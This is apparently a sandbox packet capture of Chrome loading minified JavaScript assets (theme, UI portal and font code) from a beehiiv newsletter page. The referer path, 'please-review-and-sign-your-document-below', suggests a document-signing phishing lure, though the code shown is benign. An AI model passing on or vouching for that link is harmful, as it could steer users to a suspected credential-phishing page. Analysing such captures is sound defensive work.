                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 36 66 31 38 37 63 61 33 2d 32 61 38 38 2d 35 64 31 32 2d 39 63 63 30 2d 63 65 32 34 66 62 36 61 37 31 66 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6f187ca3-2a88-5d12-9cc0-ce24fb6a71f1")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 2d 35 58 46 46 75 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 48 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 66 20 61 73 20 54 2c 73 20 61 73 20 78 7d 66 72 6f 6d 22 2e 2f 68 69 64 64 65 6e 2d 4b 75 6f 58 6d 69 4e 35 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 51 28 65 2c 74 2c 6c 2c 72 29 7b 6c 65 74 20 73 3d 62 28 6c 29 3b 6e 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 65 3d 65 3f 3f 77 69 6e 64 6f 77 3b 66 75 6e 63 74 69 6f 6e 20 61 28 75 29 7b 73 2e 63 75 72 72 65 6e 74 28 75 29 7d 72 65 74 75 72 6e 20 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 61 2c 72 29 2c 28 29 3d 3e 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 61 2c
                                                                                                                                            Data Ascii: -5XFFuu.js";import{r as H}from"./components-Oj2xMfGE.js";import{f as T,s as x}from"./hidden-KuoXmiN5.js";function Q(e,t,l,r){let s=b(l);n.useEffect(()=>{e=e??window;function a(u){s.current(u)}return e.addEventListener(t,a,r),()=>e.removeEventListener(t,a,
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 6f 6e 74 65 78 74 28 76 29 2c 70 3d 53 28 29 3b 72 65 74 75 72 6e 20 45 28 28 29 3d 3e 7b 21 75 7c 7c 21 6f 7c 7c 75 2e 63 6f 6e 74 61 69 6e 73 28 6f 29 7c 7c 28 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 70 6f 72 74 61 6c 22 2c 22 22 29 2c 75 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 29 7d 2c 5b 75 2c 6f 5d 29 2c 45 28 28 29 3d 3e 7b 69 66 28 6f 26 26 66 29 72 65 74 75 72 6e 20 66 2e 72 65 67 69 73 74 65 72 28 6f 29 7d 2c 5b 66 2c 6f 5d 29 2c 4c 28 28 29 3d 3e 7b 76 61 72 20 63 3b 21 75 7c 7c 21 6f 7c 7c 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 26 26 75 2e 63 6f 6e 74 61 69 6e 73 28 6f 29 26 26 75 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 2c 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c
                                                                                                                                            Data Ascii: ontext(v),p=S();return E(()=>{!u||!o||u.contains(o)||(o.setAttribute("data-headlessui-portal",""),u.appendChild(o))},[u,o]),E(()=>{if(o&&f)return f.register(o)},[f,o]),L(()=>{var c;!u||!o||(o instanceof Node&&u.contains(o)&&u.removeChild(o),u.childNodes.l
                                                                                                                                            2025-01-15 18:14:35 UTC862INData Raw: 70 75 73 68 28 69 29 3b 66 6f 72 28 6c 65 74 20 69 20 6f 66 28 6f 3d 61 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 68 74 6d 6c 20 3e 20 2a 2c 20 62 6f 64 79 20 3e 20 2a 22 29 29 21 3d 6e 75 6c 6c 3f 6f 3a 5b 5d 29 69 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 69 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 26 26 69 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 69 2e 69 64 21 3d 3d 22 68 65 61 64 6c 65 73 73 75 69 2d 70 6f 72 74 61 6c 2d 72 6f 6f 74 22 26 26 28 69 2e 63 6f 6e 74 61 69 6e 73 28 73 2e 63 75 72 72 65 6e 74 29 7c 7c 69 2e 63 6f 6e 74 61 69 6e 73 28 28 70 3d 28 66 3d 73 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 66 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 29
                                                                                                                                            Data Ascii: push(i);for(let i of(o=a?.querySelectorAll("html > *, body > *"))!=null?o:[])i!==document.body&&i!==document.head&&i instanceof HTMLElement&&i.id!=="headlessui-portal-root"&&(i.contains(s.current)||i.contains((p=(f=s.current)==null?void 0:f.getRootNode())


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            51192.168.2.1649773104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC560OUTGET /assets/WebThemeContext-DttfuZxo.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3697
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"e71-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a61e60728a-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 33 35 37 35 32 65 32 61 2d 30 38 31 66 2d 35 64 33 35 2d 38 33 33 63 2d 66 64 63 35 32 37 65 31 32 65 64 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="35752e2a-081f-5d35-833c-fdc527e12edb")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 69 74 79 2d 37 30 22 2c 38 30 3a 22 6f 70 61 63 69 74 79 2d 38 30 22 2c 39 30 3a 22 6f 70 61 63 69 74 79 2d 39 30 22 2c 31 30 30 3a 22 6f 70 61 63 69 74 79 2d 31 30 30 22 7d 2c 66 3d 7b 6e 6f 6e 65 3a 22 70 2d 30 22 2c 73 6d 3a 22 70 2d 34 20 73 6d 3a 70 78 2d 38 20 73 6d 3a 70 79 2d 38 22 2c 6d 64 3a 22 70 2d 34 20 73 6d 3a 70 78 2d 31 36 20 73 6d 3a 70 79 2d 31 32 22 2c 6c 67 3a 22 70 2d 34 20 73 6d 3a 70 78 2d 32 34 20 73 6d 3a 70 79 2d 31 36 22 7d 2c 64 3d 7b 6e 6f 6e 65 3a 22 73 68 61 64 6f 77 2d 6e 6f 6e 65 22 2c 78 73 3a 22 73 68 61 64 6f 77 2d 78 73 22 2c 73 6d 3a 22 73 68 61 64 6f 77 2d 73 6d 22 2c 6d 64 3a 22 73 68 61 64 6f 77 2d 6d 64 22 2c 6c 67 3a 22 73 68 61 64 6f 77 2d 6c 67 22 2c 78 6c 3a 22 73 68 61 64 6f 77 2d 78 6c 22 7d 2c 62 3d 7b 6e
                                                                                                                                            Data Ascii: ity-70",80:"opacity-80",90:"opacity-90",100:"opacity-100"},f={none:"p-0",sm:"p-4 sm:px-8 sm:py-8",md:"p-4 sm:px-16 sm:py-12",lg:"p-4 sm:px-24 sm:py-16"},d={none:"shadow-none",xs:"shadow-xs",sm:"shadow-sm",md:"shadow-md",lg:"shadow-lg",xl:"shadow-xl"},b={n
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 70 72 69 6d 61 72 79 5f 62 6f 72 64 65 72 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 70 72 69 6d 61 72 79 5f 73 68 61 64 6f 77 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 73 65 63 6f 6e 64 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 73 65 63 6f 6e 64 61 72 79 5f 74 65 78 74 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 73 65 63 6f 6e 64 61 72 79 5f 62 6f 72 64 65 72 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 5f 64 65 73 6b 74 6f 70 5f 65 6e 61 62 6c 65 64 3a 21 30 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 73 65 63 6f 6e 64 61 72 79 5f
                                                                                                                                            Data Ascii: navbar_button_primary_border_color:"",navbar_button_primary_shadow:"",navbar_button_secondary_background_color:"",navbar_button_secondary_text_color:"",navbar_button_secondary_border_color:"",navbar_login_button_desktop_enabled:!0,navbar_button_secondary_
                                                                                                                                            2025-01-15 18:14:35 UTC487INData Raw: 29 3b 5f 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 57 65 62 54 68 65 6d 65 43 6f 6e 74 65 78 74 22 3b 63 6f 6e 73 74 20 77 3d 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 77 65 62 54 68 65 6d 65 3a 6f 2c 69 73 45 6e 61 62 6c 65 64 3a 74 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 72 61 64 69 75 73 43 6c 61 73 73 3a 73 2c 73 68 61 64 6f 77 43 6c 61 73 73 3a 61 7d 3d 72 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 28 7b 73 68 61 64 6f 77 43 6c 61 73 73 3a 64 5b 6f 3f 2e 73 68 61 64 6f 77 7c 7c 22 6e 6f 6e 65 22 5d 2c 72 61 64 69 75 73 43 6c 61 73 73 3a 62 5b 6f 3f 2e 72 61 64 69 75 73 7c 7c 22 6e 6f 6e 65 22 5d 7d 29 2c 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 6e 2e 6a 73 78 28 5f 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7b 77 65 62 54 68 65 6d 65 3a 6f 2c 63 6c 61 73 73 65
                                                                                                                                            Data Ascii: );_.displayName="WebThemeContext";const w=({children:e,webTheme:o,isEnabled:t})=>{const{radiusClass:s,shadowClass:a}=r.useMemo(()=>({shadowClass:d[o?.shadow||"none"],radiusClass:b[o?.radius||"none"]}),[o]);return n.jsx(_.Provider,{value:{webTheme:o,classe


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            52192.168.2.1649775104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC850OUTGET /assets/use-tree-walker-Inv4mdsP.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 868
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"364-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a66a74c477-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 31 33 34 33 63 65 64 2d 65 31 64 39 2d 35 33 35 36 2d 62 64 30 65 2d 36 35 38 39 61 35 62 30 35 63 35 61 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51343ced-e1d9-5356-bd0e-6589a5b05c5a")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC410INData Raw: 2e 75 73 65 52 65 66 28 72 29 2c 6e 3d 63 2e 75 73 65 52 65 66 28 74 29 3b 63 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 6f 2e 63 75 72 72 65 6e 74 3d 72 2c 6e 2e 63 75 72 72 65 6e 74 3d 74 7d 2c 5b 72 2c 74 5d 29 2c 6d 28 28 29 3d 3e 7b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 3b 6c 65 74 20 75 3d 64 28 65 29 3b 69 66 28 21 75 29 72 65 74 75 72 6e 3b 6c 65 74 20 61 3d 6f 2e 63 75 72 72 65 6e 74 2c 6c 3d 6e 2e 63 75 72 72 65 6e 74 2c 70 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 73 3d 3e 61 28 73 29 2c 7b 61 63 63 65 70 74 4e 6f 64 65 3a 61 7d 29 2c 69 3d 75 2e 63 72 65 61 74 65 54 72 65 65 57 61 6c 6b 65 72 28 65 2c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 45 4c 45 4d 45 4e 54 2c 70 2c 21 31 29 3b 66 6f 72 28 3b 69 2e 6e 65 78 74 4e
                                                                                                                                            Data Ascii: .useRef(r),n=c.useRef(t);c.useEffect(()=>{o.current=r,n.current=t},[r,t]),m(()=>{if(!e||!f)return;let u=d(e);if(!u)return;let a=o.current,l=n.current,p=Object.assign(s=>a(s),{acceptNode:a}),i=u.createTreeWalker(e,NodeFilter.SHOW_ELEMENT,p,!1);for(;i.nextN


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            53192.168.2.1649774104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC840OUTGET /assets/index-CJHGmWl4.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2836
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"b14-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a64eef4262-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 31 38 64 62 66 31 64 2d 31 64 31 34 2d 35 34 36 39 2d 38 63 65 36 2d 65 63 65 66 39 30 66 64 62 65 38 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="018dbf1d-1d14-5469-8ce6-ecef90fdbe8e")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 6e 74 2d 63 6f 75 72 69 65 72 22 2c 64 69 64 6f 74 3a 22 66 6f 6e 74 2d 64 69 64 6f 74 22 2c 67 61 72 61 6d 6f 6e 64 3a 22 66 6f 6e 74 2d 67 61 72 61 6d 6f 6e 64 22 2c 67 65 6f 72 67 69 61 3a 22 66 6f 6e 74 2d 67 65 6f 72 67 69 61 22 2c 68 65 6c 76 65 74 69 63 61 3a 22 66 6f 6e 74 2d 68 65 6c 76 65 74 69 63 61 22 2c 6c 6f 72 61 3a 22 66 6f 6e 74 2d 6c 6f 72 61 22 2c 22 6c 75 63 69 64 61 2d 63 6f 6e 73 6f 6c 65 22 3a 22 66 6f 6e 74 2d 6c 75 63 69 64 61 2d 63 6f 6e 73 6f 6c 65 22 2c 6d 65 72 72 69 77 65 61 74 68 65 72 3a 22 66 6f 6e 74 2d 6d 65 72 72 69 77 65 61 74 68 65 72 22 2c 6d 6f 6e 61 63 6f 3a 22 66 6f 6e 74 2d 6d 6f 6e 61 63 6f 22 2c 6d 6f 6e 74 73 65 72 72 61 74 3a 22 66 6f 6e 74 2d 6d 6f 6e 74 73 65 72 72 61 74 22 2c 22 6f 70 65 6e 2d 73 61 6e 73
                                                                                                                                            Data Ascii: nt-courier",didot:"font-didot",garamond:"font-garamond",georgia:"font-georgia",helvetica:"font-helvetica",lora:"font-lora","lucida-console":"font-lucida-console",merriweather:"font-merriweather",monaco:"font-monaco",montserrat:"font-montserrat","open-sans
                                                                                                                                            2025-01-15 18:14:35 UTC1010INData Raw: 26 22 66 6f 6e 74 2d 72 65 67 75 6c 61 72 22 2c 72 3d 3d 3d 22 6d 65 64 69 75 6d 22 26 26 22 66 6f 6e 74 2d 6d 65 64 69 75 6d 22 2c 72 3d 3d 3d 22 73 65 6d 69 62 6f 6c 64 22 26 26 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 2c 72 3d 3d 3d 22 62 6f 6c 64 22 26 26 22 66 6f 6e 74 2d 62 6f 6c 64 22 2c 72 3d 3d 3d 22 62 6c 61 63 6b 22 26 26 22 66 6f 6e 74 2d 62 6c 61 63 6b 22 2c 66 26 26 22 66 6f 6e 74 2d 67 61 72 61 6d 6f 6e 64 22 2c 6d 2c 64 3d 3d 3d 22 68 65 61 64 65 72 22 26 26 75 2c 64 3d 3d 3d 22 62 6f 64 79 22 26 26 62 29 3b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 22 70 22 3a 72 65 74 75 72 6e 20 73 2e 6a 73 78 28 22 70 22 2c 7b 73 74 79 6c 65 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 28 22 62 6f 64 79 22 29 2c 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 3b
                                                                                                                                            Data Ascii: &"font-regular",r==="medium"&&"font-medium",r==="semibold"&&"font-semibold",r==="bold"&&"font-bold",r==="black"&&"font-black",f&&"font-garamond",m,d==="header"&&u,d==="body"&&b);switch(n){case"p":return s.jsx("p",{style:t,className:e("body"),children:o});


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            54192.168.2.1649776104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC848OUTGET /assets/useIsLoggedIn-BbU3-q43.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
